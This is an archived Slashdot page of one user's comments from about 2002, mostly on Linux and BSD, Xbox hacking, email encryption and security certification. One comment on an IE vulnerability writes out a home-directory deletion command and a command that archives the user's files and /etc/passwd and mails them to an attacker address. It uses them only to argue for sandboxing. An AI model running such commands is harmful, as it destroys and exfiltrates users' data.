Slashdot Mirror


User: karlm

karlm's activity in the archive.

Stories: 0
Comments: 542

Comments · 542

  1. Re:Thousand compromised? on New "SQLsnake" Microsoft Worm · · Score: 2

    What the hell kind of nitro-burning printer needs a dual cpu Sun box to keep it fed? Dual cpus don't help you with io bandwidth. Couldn't that machine support both the scanner and the printer? How's Samba for print sharing?

  2. Would someone please... on Nintendo Drops GameCube Price to $150 · · Score: 1
    Take that Xbox DVD remote and use that program for palm pilots that allows you to record and playback IR signals. Then please anonymously leak the recorded buttons on the web. This shouldn't break the DMCA, since it's information you're broadcasting, but that doesn't stop MS from filing suit.

    I'm not sure if this would help or hurt MS, but it'd help consumers. (The XBox would be more competitive with a free DVD playing option, but it would cut into sales for the DVD kit.)

  3. Does this mean... on XBox Live Network · · Score: 1
    Lots more MS OS boxes connected to broadband?

    What happens when they find a buffer overflow in the XBox IP stack or a popular game? The XBox normally doesn't ever switch out of ring0, so any buffer overflow is a kernel buffer overflow. You can't really enforce security restrictions between ring 0 code segments.

    Come to think of it, maybe this is the easiest way to get Linux on the XBox... Screw the encrypted BIOS... boot an approved game with a buffer overflow and overflow the buffer with a ramdisk and a Linux kernel, then jump into the kernel... mount /usr from NFS and you're all set. The HD would be unlocked, so you could install on the HD, provided you trust your xfat drivers. It would be really slick to figure out the memory locations of the various MS XBox hardware drivers and be able to hijack them when you hijack the hardware. After all, they're already loaded into RAM when you execute your buffer overflow.

  4. Re:Kernel 2.6 on Linux Beta Kernel 2.5.16 Out · · Score: 2

    I hate to nit-pick, but your naming is backwards. X clients don't do any rendering. X servers do rendering. XFree86 is an X11 server. All of your programs take on the role of X clients in the client-server model. When the client wants something done or needs information, it connects to the Xserver. The client does all of the pushing and pulling of the data. The server sits there and waits for requests and processes them. The Xclients are the proactive parties in the transaction model.

  5. Twofish? AES? Serpent? on OpenBSD 3.1 Released · · Score: 2

    Do any of you know if the OpenBSD people have plans to replace blowfish with twofish in the kernel? What about Serpent and AES? Of all the people, I'm surprised that the OpenBSD people would be satisfied with "eh.. blowfish is good enough, why upgrade?".

  6. Re:OpenBSD 3.1 released today... on Linux Beta Kernel 2.5.16 Out · · Score: 1
    See? This is what I hate about OpenBSD and its developers/users.. they always whine about Linux being so much more mediatized than their own OS, it all goes like 'we're such poor babies, no one notices our OS which is oh-so-much-better than mainstream Linux'

    I've never had OpenBSD on any of my machines. I'm a Debian guy. I roll my own kernel .debs with encrypted loop and tweak my own USB keyboard driver. Yet, the 2.5 kernel probably isn't important enough to any of you to make the front page. If the kernel matters to you that much, you read kernel.org or at least read the linux section and don't need it on the front page. Don't get me wrong, production kernel releases or -ac kernel releases may still be front-page worthy, but unless the submitter mentions some really cool new feature, development kernel releases aren't front-page worthy.

    I'm just saying that I'm quite the Debian fanboy. I just realize that unstable kernel release notices without cool feature highlights shouldn't make the front page while the OpenBSD release isn't up there. Now it's pretty much moot since they finally put up an OpenBSD story. (I would have submitted a story, but I would not have done it justice.)

    Don't label me "one of those OpenBSD users/developers". I admire elegant design and good clean software. I've heard really good things about OpenBSD, but I am in no way an OpenBSD user. We'll see. Maybe I'll become an OpenBSD user sometime this week or next.

  7. Re:The 2.4 series. on Linux Beta Kernel 2.5.16 Out · · Score: 3, Interesting
    I would guess it's pretty much bug fixes from here on out in the 2.4 line. Sure, you'll get some more obscure drivers and such, but I don't think too much more exciting is going to happen. The new 2.4 kernel maintainer probably won't do anything too controversial, particularly after that VM switch Linus pulled earlier in 2.4.

    The 2.5 kernel is a major rework. IIRC, they're making everything possible modules, and you'll need to make an initial ramdisk with your ide/scsi/network/fs drivers in order to boot. Any idea how stable 2.5 is now? It sounds pretty cool. I've dabbled in kernel programming and am willing to put up with 1 week uptimes as long as I'm running ext3 or XFS. I tried L4-linux, but 8-hour uptimes just hurt. Yes, I'm also playing with Debian HURD. There's lots of really cool stuff going on nowadays in the OS world.

    Any idea if there are any plans to merge the international patch (crypto stuff) into 2.4 or 2.5? Encrypted loop devices and encrypted swap really should be part of the main kernel. After all, the 2.4 kernel is currently being maintained by a minor in South America, so the 2.4 kernel is pretty safe from the US govt/US courts at the moment. Hmm... DeCSS in kernel-space anyone?

  8. OpenBSD 3.1 released today... on Linux Beta Kernel 2.5.16 Out · · Score: 2, Insightful
    ... and this makes the front page?

    I prefer Linux myself, but a major and highly respected new *NIX distro release beats a beta kernel release any day of my 8-day week.
    </rant>

  9. Re:I wish things were always so easy... on MSIE Uber-patch Of The Month · · Score: 2
    There's also a perl script called autoupdate. Check it out. It runs pretty well. It's a pretty simple script, actually. No need to centrally register your machine. It just polls the RH update site for new RPMs and checks them against the ones you have installed.

    I had both autoupdate and up2date running on a box o' mine. I now run Debian and have it "apt-get update; apt-get dist-upgrade -y" nightly. I believe you can do similar things with FreeBSD and OpenBSD. The nice thing is, every piece of software on my box (except the loop-AES stuff and the Sun JDK) is within 24 hours of being up to date. FreeAmp, Gaim, KOffice, etc. all update.

    Does windowsupdate cover WinZip, AIM, MS Office, and WinAmp? A buddy of mine got owned a bit over a year ago, just before MS decided to have windowsupdate cover IIS. He assumed IIS was covered b/c it came on the install CD. Within two weeks of installing Win2K Advanced Server, we found DDoS tools on his machine. That was the day his love turned to hate. He no longer defends anything MS or encourages use of MS software. His laptop still dual boots, but all of his servers run alternative OSes exclusively.

  10. Re:A very dumb idea on r* Programs Being Removed from OpenBSD -current · · Score: 2
    Agreed. Wholeheartedly.

    If you're going to use plaintext tools, you shouldn't even bother having separate user accounts. Make one user account called "guest" with a null password. It's easier that way, and it's effectively what you're doing when you use insecure protocols internally.

    Of course, if you're using 100% IPSec internally, then anything that uses passwords for authentication should be fine. However, IIRC, rsh just checks the source port of the packet and then believes that you are who you claim to be with absolutely no authentication. IPSec can't help you there.

  11. Re:A little off topic, but... on Xbox Price Drops to $200 · · Score: 2
    From Bunnie's analysis (web.mit.edu/bunnie/), it looks like the encrypted ROM is decrypted by the southbridge. Hopefully the encryption is a stream cipher (oh happy day if it's a data-independent stream cipher) so they can use trial and error to get OpenBIOS coming out of the southbridge. Bunnie is working on using an FPGA to read the output of the southbridge. The stuff was slightly over my head, but that's my understanding of the current state of the art in XBox BIOS hacking. (Is the BIOS loaded 8 bits at a time into RAM, or what was that full-duplex 9-wire bus protocol coming out of the southbridge?)

    Bunnie says he's working on his thesis right now. MIT's thesis due date is the 24th, so hopefully we'll all see a lot more work on the Xbox BIOS in the next couple of months.

  12. Re:Being an Avid Console Gamer on PS2 Price May Fall, Gamecube Staying Put · · Score: 3, Interesting
    The HD is locked, so you need to go through the XBox boot sequence to get it unlocked then hot-swap the IDE cable while your PC BIOS is in setup mode, then leave setup mode for the HD to be recognized. It's not worth it unless you're mirroring the HD to try and reverse-engineer the stupid thing.

    You're fooling yourself if you think you can reasonably salvage anything from an XBox at this point in time. Sure, if you have the proper test equipment, you can watch the XBox unlock the HD, but that's more work than it's worth for an 8 GB HD for most of us. If any of you has a broken XBox or knows of a good place to pick up one for free, I'm sure I could find some MIT students willing to play with the BIOS encryption this Summer. Luckily as the price falls, more people are willing to risk breaking their XBoxes in order to reverse-engineer the BIOS encryption.

    If someone finally breaks the BIOS encryption on the XBox (or figures out a safe way to bypass the decryption while loading the BIOS) and we get Linux BIOS or Open BIOS on the XBox, I'd be mighty tempted to pick up an XBox or four. After all, I'm only running a 266 MHz with 288 MB of RAM really is fine for almost everything.).

  13. Re:Here goes my Karma, but slashdot uses doublecli on Seems Nobody Gives A Damn About Privacy · · Score: 2

    Is this guy joking? I black-holed doubleclick, so I can't tell.

  14. Re:Don't reveal your client's identity on How to "Open Source" Custom, Contract Software? · · Score: 2

    You missed the point of the metaphor. I was talking about using duct tape in parallel with a lock. Taping your frame to the same post to which it's locked. If you don't trust the lock, the duct tape really does you no good. It's a completely different situation with a quick-release wheel vs. a duct taped quick-release wheel. My point is that if you aren't comfortable with a bike lock, you shouldn't feel any safer about a bike lock wrapped in duct tape or a frame locked and taped to a pole. A good knife will mean an extra 10 seconds to the thief. If a lock isn't enough, you need to rethink your whole bike security strategy rather than adding duct tape. Maybe I should have said something about wrapping the lock in duct tape to make it harder to cut.

  15. Not working... on Under Attack by PanIP's Patent Lawyers? · · Score: 2

    Something's wrong... I clicked on the PanIP link 5 times and the site is still up and running. I usually can't click on a front page link once before the site goes down. What gives?

  16. Re:Easy to do? on Smart Cards Vulnerable to Photo-Flash Attacks? · · Score: 2
    They're criminals. Why wouldn't they just steal one?

    I know you're just trying to be funny, but for the benefit of the 14 year olds out there, there's more than one kind of criminal. Some kinds of criminals are not willing to do some things. Most criminals even have morals and justify their crimes in their own heads and are not willing to do other kinds of crime. I think it's probably much easier for a criminal to convince himself/herself that credit card fraud is okay vs. breaking and entering being okay. I wouldn't be surprised if many /.

    People who steal satellite TV are criminals. Why don't they just go out and mug people for the satellite TV money instead? It's a question of morals. 99% of criminals have them.

  17. Re:Don't reveal your client's identity on How to "Open Source" Custom, Contract Software? · · Score: 3, Insightful
    Someone motivated enough to dig through source code to figure out your database vendor and version, etc., is also dedicated enough to use other profiling techniques. In the end, you're going to spend more time than it's worth trying to hide your database version. Anyone going after your source code is specifically targeting your company. If looking through the source code is the easiest way for them to get that info, you're putting too much hard work into hiding that info.

    Here's the easiest way to put the argument: sure it's harder for the attacker, but it's like using a Kryptonite lock and duct tape to attach your bike to the bike rack. Sure it's more secure, but not worth the effort. If you think you need the duct tape, maybe you should lock your bike in a better neighborhood and spend your time walking an extra 4 blocks or something instead of spending that same amount of time attaching and cutting duct tape. In the same way, you should spend your time properly securing and maintaining all of your boxes, setting up proper cryptography, and enforcing strong passwords with proper limits on lifetimes. Try getting help setting up a firewall from MIT Network Security and they'll tell you to set up cron jobs to port scan your boxes and vulnerability scan your boxes instead. It's a bit extreme to discourage the use of firewalls, but I can definitely see where they're coming from. Just like Morris discouraging shadowed password files. md5 passwords and strongly enforced password complexity offer MUCH better security than shadowed crypt password files.

  18. Re:90 percent also believe... on Science a Mystery to U.S. Citizens · · Score: 2
    I'll leave you with this thought: Consider the plight of the non-believer, surrounded 24/7 by people who actually believe this stuff; surrounded by a population of which 65% honestly believe there are angels flying around them throughout the day. It's literally like being trapped inside of a mad-house for your entire life.

    Just a few points:

    1) I'll freely admit that a lot of nuts get pulled into their own little version of the dominant religion. However, I'd rather have those nuts being devoted to loving other people than have them believe life is hopeless with no point, and then following some whim to go and shoot a few co-workers and then get gunned down by the police. Say what you will about Christianity, but I think objectively it's pretty much the safest outlet for nuts unwilling to go into treatment.

    2) I consider myself a Christian. I do not consider American Pop Religion or American Folk Religion to be Christianity. What you're describing sounds to me like American Folk Religion. I agree that it sucks to be surrounded by that. I think it makes me look like an idiot because people hear the word "Christianity" and think of American Folk Religion (good people who go to church become angels when they die) or American Pop Religion (be good, and go to Church a few times a year to keep appearances up and consult your horoscope and you'll do fine).

    3) Everyone thinks they are part of some small subset of the population that really understands how things work, well, at least every reasonably smart person believes this. I feel like fewer than 5% of the population has the patience and intelligence to sit down and actually think through what Christianity really teaches and perform appropriate reality checks. To flippantly deny all aspects of someone else's beliefs because you disagree with some of their points is to deny yourself the opportunity of having your thought process challenged. Allow yourself to accept their axioms for but a moment and look at what they really have to say, from their perspective. It's a good mental exercise, sometimes painful, but I believe always worthwhile. You may not learn anything worthwhile from them, but it helps you keep perspective and keeps your mind limber. At this point, I think anyone has an ice cube's chance in hell of changing any of my main points of belief, but I still am willing, and even enjoy, talking to others about their beliefs. It's a good mental exercise.

    4) The Church got itself into trouble back in the middle ages by making assertions about things which it really had nothing to say. Embracing Aristotelian physics was out of the scope of the Church's expertise. Likewise, experimental science can not answer "why" questions. As Feynman said, "Why does an electron weigh?". To claim that Science is the ultimate authority on religion is just as false as saying religion is the ultimate authority on physics. Good science has never made claims on events occurring outside of time. Time is believed to have sprung into existence at the beginning of the universe. What about events outside of space-time? Obviously certain things have some analogy of "occurring" outside of time, otherwise time would not have "occurred". Science intentionally does not make any claims about such things. Religion speculates about such things. Sometimes these speculations claim certain things about things happening inside of time. These things are testable. Test them. However, please do not abuse science by using it to make claims that it cannot. People from all kinds of religions (including Christianity and Atheism) contort science to make it seem to say things it does not. Also realize that science is not one entity, just like religion is not one entity. Science does not have a consensus on many things, just like Christianity does not have a consensus on many things.

    5) Even St. Augustine (one of the most respected Biblical Scholars of all time) wrote essays back before the middle ages arguing that the Bible could not be claiming the earth was created in a literal 6 days. I wish Christians and non-Christians would stop throwing around this 6 days thing. I'm an MIT student; my pastor decided to take some classes at seminary after he got his physics degree from Harvard, and he got hooked and decided to teach Christianity instead of Physics. Christianity can provide the basis for a very rational and self-consistent worldview, just as atheism can. Don't believe me, check out the mp3 of some of his sermons.

  19. Re:The more I know about windows... on Don't Hit That Back Button · · Score: 2
    no can do. owned by root or admin. you'll have to enter a root or admin password to do anything damaging.

    Better, but not good enough. It's great that IE isn't actually part of OS X and the default account isn't an Admin (root) account, but there's still plenty of "damage" you could do. fileExec("rm -rf ~/;") sounds pretty good. Now, of course you make nightly backups, so removing all of your files means a loss of only today's work, but it's still a pain in the arse. Oh, and does OS X have mimencode and mailto? It must have equivalent functionality somewhere. How'd you like fileExec("tar -cf - ~/ /etc/passwd | gzip --best | mimencode | mailto -s `ifconfig` blackhat@blackhat.com")? I'm pretty sure the password hashes are in shadow on OS X, but the enumeration of users is helpful, as is all of your current user's directory.

    Mac OS X is on the right path, but what the world really needs is good capabilities-based security. Your browser should not even be able to know if you have /bin/rm, much less be able to execute it, unless it asks you to give it an executable file handle to /bin/rm. The days of programs reasonably being assumed to act in the interests of the users are long gone. Security thinking should catch up and treat each program as a separate user with few rights by default. In other words, everything should be sandboxed by default and should have to ask the user for anything outside of the sandbox.

  20. Re:Test it out if you have IE on Don't Hit That Back Button · · Score: 1

    Anyone working on porting Wine to Win32? Seriously, this could help with a lot of error recovery and sandboxing :-)

  21. XP embedded? on Declawing Windows: Impossible? · · Score: 2
    Can't they actually make support cheaper by making a new desktop OS based on XP embedded?

    It's supposedly a stripped down version of XP, right? Couldn't they just add a bunch of modules to XP Embedded to make it a desktop OS? This would probably also make it lighter on its feet. It would also probably reduce the codebase they need to support. It should also make it easier to get that EAL4 security rating they're after.

  22. 2 things to make the 'net a better place on What Software Should ISPs Distribute and Support? · · Score: 2
    • Strong password generator
    • A certificate to go with that email address

    Strong Passwords
    If people had a program to generate strong passwords, then there would be fewer systems and accounts for black hats to use to leapfrog across the net to hide their tracks. I'm working on a java applet that uses a strong PRNG seeded with user mouse movements and input from SecureRandom to generate 5 pronounceable passwords and 5 phrases made of real words. Something like this bundled with AOL's account setup program would do great things for their security, and by extension, make the net a better place for everyone.

    Public Key Infrastructure
    ISPs should get Verisign or Thawte, or another big name certificate and use that to sign certificates for their customers. Give them a certificate with their email address. In a couple of years the open mail relay spam problem will fix itself as everyone will automatically throw away unsigned email and ISPs will revoke certs of spammers, or there will be public databases of spammer certs.

    PKI doesn't cost companies very much, only a little for the certificate and a little bit of education. Many email clients already have crypto plugins.

    Sure, you'll still have problems, mostly from ISPs doing poor identity checking and users using bad passwords.

  23. Re:Encrypted email will arrive on Can GnuPG Deliver? · · Score: 2
    Yeah, but then they could not read your mail!

    I know you're just making a funny, but the 14 year olds out there don't know this and it's a good point to make.

    They and half the internet can read your email now. People already have a false sense of security, so having AOL handle your crypto is a huge step forward for 99.9% of the population.

    Also, if it's properly implemented, they don't have to be able to read your email. They couldn't read your email if your private key is generated and encrypted inside the client before being stored on the server. As long as they only get to store an MD5 sum of your password, you can log in without jeopardizing the salted hash used to encrypt the secret key. They only need to sign the public key.

    If I were to publish my GPG public key ring, it would most likely take you millions of years to extract my secret key. (Yes, quantum computing is a slight problem, but my public key is more vulnerable to a quantum discrete log attack than my password is vulnerable to a quantum 3DES and MD5 attack, given only a few bytes of known plaintext in the private key.) My passphrase is between 15 and 20 characters, using lower case, upper case, numbers and symbols. If I ever showed my GF my passphrase, she wouldn't be able to remember it because it makes no sense even to people who know me well. Sure, AOL could trojan your login or email client, but if you're that worried about AOL, there's always someone willing to let you use your own client. AOL is plenty trustworthy for the average person, as long as they'd have to trojan your login to get your passphrase (which is less than 40 bits of entropy for the average person, way less).

  24. Encrypted email will arrive on Can GnuPG Deliver? · · Score: 5, Insightful
    ...as soon as AOL decides it makes business sense to integrate it.

    I sign nearly all of my outgoing emails, but seriously, encryption will remain a geek toy until AOL or another big player decides to provide public key infrastructure (PKI, keys signed by widely trusted authorities, or sufficiently many people that are minimally separated from you) for its users. There are plenty of GUI encryption email clients out there. I believe there's a GPG plugin for Eudora. However, finding your friend's public key is the big problem right now. Once everyone's ISPs step in and sign the user's keys and provide key servers, then signed and encrypted email will be the norm. After a short bit, you will be able to filter out SPAM by doing good checks on signatures, or prosecuting those spammers that actually sign their emails with valid and registered keys. Encryption will also greatly increase CPU demands for mass emailing. This is why ISPs will like crypto: it deters spam and reduces their bandwidth requirements. The big question is: how long will it take for a major ISP to start providing PKI?

    Key generation isn't hard. Once AOL starts signing all of their users' public keys, then it will be common practice for your email client to go to all of the recipients' ISPs, verify their Verisign certificate, and verify their signature on the user's public key, then encrypt everything at transmit time.

    Key generation isn't all that tough. Nearly everyone trusts Verisign.

  25. EAL4 on SELinux Panel at FOSE in Washington · · Score: 3, Informative
    I briefly worked for a startup that ran a brief stint at getting their new programming language certified as EAL7... until they realized that it would probably take at least a minimum of $500,000 for each try at certification. This stuff is expensive (and with good reason). On top of that, each attempt at certification comes back with either "yes" or "no, and here's why...". If you try and get your system certified as EAL7 and it meets the criteria for EAL4 but not EAL7, you don't get an EAL4 certification, you get a failed EAL7 certification attempt.

    A lot of this stuff is based on design documentation (and an analysis of the design), demonstration that the design was followed, and solid clear end-user documentation. I can't imagine a design that requires IE to be integrated with the OS will pass EAL4 certification, so they may end up perjuring themselves during the certification process. Too bad the certification documents don't need to be made public. I would strongly hope that nobody will EAL4 certify anything with I.E. integrated. Its track record seems to indicate that the design was not well reflected in the implementation. Keep an eye out, if the certified version of Win2K doesn't have I.E. integrated, maybe the DOJ can slap MS on the wrist one more time.

    Solaris 8 has a special EAL4 version, but you (rightly) pay quite a premium for that version, as I understand it. In order to get something certified, you submit an exact copy of the system to be certified. If one bit (other than passwords, usernames, and groups) is different from what is certified (besides allowable changes specified in the certified end-user documentation), it's no longer EAL4 certified.

    This is pretty hard-core stuff. The previous security record of Win2K doesn't really come into account, because the EAL version would be best described as a specific configuration of an OS based on Win2K, not actually Win2K.

    Debian is pretty hard core with quality standards. Bastille and Debian probably stand the best chance of being able to put together an EAL4 distro, but neither of them is that well off financially. RedHat has some quality issues, but should be able to put something together as good as the certified version of NT. I don't think the costs would be justified for RedHat right now, though. The chances are slim to none that you'll ever be able to serve web pages from an all-microsoft EAL4 system within a decade. I highly doubt that EAL4 version of Solaris 8 has a webserver, at least one capable of dynamic content.